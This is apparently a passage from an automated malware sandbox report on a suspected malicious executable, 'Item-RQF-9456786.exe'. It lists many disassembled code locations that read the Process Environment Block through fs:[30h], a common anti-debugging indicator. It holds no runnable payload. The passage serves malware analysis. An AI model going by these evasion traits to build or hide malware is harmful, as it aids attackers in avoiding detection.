    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179645D mov eax, dword ptr fs:[00000030h]5_2_0179645D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C245A mov eax, dword ptr fs:[00000030h]5_2_017C245A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182A4B0 mov eax, dword ptr fs:[00000030h]5_2_0182A4B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA430 mov eax, dword ptr fs:[00000030h]5_2_017DA430
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C427 mov eax, dword ptr fs:[00000030h]5_2_0179C427
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A04E5 mov ecx, dword ptr fs:[00000030h]5_2_017A04E5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D44B0 mov ecx, dword ptr fs:[00000030h]5_2_017D44B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A64AB mov eax, dword ptr fs:[00000030h]5_2_017A64AB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C460 mov ecx, dword ptr fs:[00000030h]5_2_0182C460
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8770 mov eax, dword ptr fs:[00000030h]5_2_017A8770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184678E mov eax, dword ptr fs:[00000030h]5_2_0184678E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0750 mov eax, dword ptr fs:[00000030h]5_2_017A0750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov esi, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov ecx, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018207C3 mov eax, dword ptr fs:[00000030h]5_2_018207C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E7E1 mov eax, dword ptr fs:[00000030h]5_2_0182E7E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0710 mov eax, dword ptr fs:[00000030h]5_2_017A0710
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC700 mov eax, dword ptr fs:[00000030h]5_2_017DC700
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181C730 mov eax, dword ptr fs:[00000030h]5_2_0181C730
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AC7C0 mov eax, dword ptr fs:[00000030h]5_2_017AC7C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A07AF mov eax, dword ptr fs:[00000030h]5_2_017A07AF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824755 mov eax, dword ptr fs:[00000030h]5_2_01824755
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E75D mov eax, dword ptr fs:[00000030h]5_2_0182E75D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D2674 mov eax, dword ptr fs:[00000030h]5_2_017D2674
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BC640 mov eax, dword ptr fs:[00000030h]5_2_017BC640
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A262C mov eax, dword ptr fs:[00000030h]5_2_017A262C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE627 mov eax, dword ptr fs:[00000030h]5_2_017BE627
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D6620 mov eax, dword ptr fs:[00000030h]5_2_017D6620
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8620 mov eax, dword ptr fs:[00000030h]5_2_017D8620
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2619 mov eax, dword ptr fs:[00000030h]5_2_017E2619
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E609 mov eax, dword ptr fs:[00000030h]5_2_0181E609
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]5_2_017DA6C7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA6C7 mov eax, dword ptr fs:[00000030h]5_2_017DA6C7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D66B0 mov eax, dword ptr fs:[00000030h]5_2_017D66B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC6A6 mov eax, dword ptr fs:[00000030h]5_2_017DC6A6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov edx, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov esi, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018369C0 mov eax, dword ptr fs:[00000030h]5_2_018369C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186A9D3 mov eax, dword ptr fs:[00000030h]5_2_0186A9D3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E9E0 mov eax, dword ptr fs:[00000030h]5_2_0182E9E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C912 mov eax, dword ptr fs:[00000030h]5_2_0182C912
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182892A mov eax, dword ptr fs:[00000030h]5_2_0182892A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0183892B mov eax, dword ptr fs:[00000030h]5_2_0183892B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D49D0 mov eax, dword ptr fs:[00000030h]5_2_017D49D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01820946 mov eax, dword ptr fs:[00000030h]5_2_01820946
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C97C mov eax, dword ptr fs:[00000030h]5_2_0182C97C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C89D mov eax, dword ptr fs:[00000030h]5_2_0182C89D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D0854 mov eax, dword ptr fs:[00000030h]5_2_017D0854
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B2840 mov ecx, dword ptr fs:[00000030h]5_2_017B2840
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov ecx, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA830 mov eax, dword ptr fs:[00000030h]5_2_017DA830
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186A8E4 mov eax, dword ptr fs:[00000030h]5_2_0186A8E4
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C810 mov eax, dword ptr fs:[00000030h]5_2_0182C810
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE8C0 mov eax, dword ptr fs:[00000030h]5_2_017CE8C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836870 mov eax, dword ptr fs:[00000030h]5_2_01836870
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836870 mov eax, dword ptr fs:[00000030h]5_2_01836870
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0887 mov eax, dword ptr fs:[00000030h]5_2_017A0887
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179CB7E mov eax, dword ptr fs:[00000030h]5_2_0179CB7E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184EBD0 mov eax, dword ptr fs:[00000030h]5_2_0184EBD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CEB20 mov eax, dword ptr fs:[00000030h]5_2_017CEB20
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CEB20 mov eax, dword ptr fs:[00000030h]5_2_017CEB20
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182CBF0 mov eax, dword ptr fs:[00000030h]5_2_0182CBF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CEBFC mov eax, dword ptr fs:[00000030h]5_2_017CEBFC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8BF0 mov eax, dword ptr fs:[00000030h]5_2_017A8BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181EB1D mov eax, dword ptr fs:[00000030h]5_2_0181EB1D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01868B28 mov eax, dword ptr fs:[00000030h]5_2_01868B28
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01868B28 mov eax, dword ptr fs:[00000030h]5_2_01868B28
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0BCD mov eax, dword ptr fs:[00000030h]5_2_017A0BCD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C0BCB mov eax, dword ptr fs:[00000030h]5_2_017C0BCB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836B40 mov eax, dword ptr fs:[00000030h]5_2_01836B40
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836B40 mov eax, dword ptr fs:[00000030h]5_2_01836B40
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0BBE mov eax, dword ptr fs:[00000030h]5_2_017B0BBE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0BBE mov eax, dword ptr fs:[00000030h]5_2_017B0BBE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186AB40 mov eax, dword ptr fs:[00000030h]5_2_0186AB40
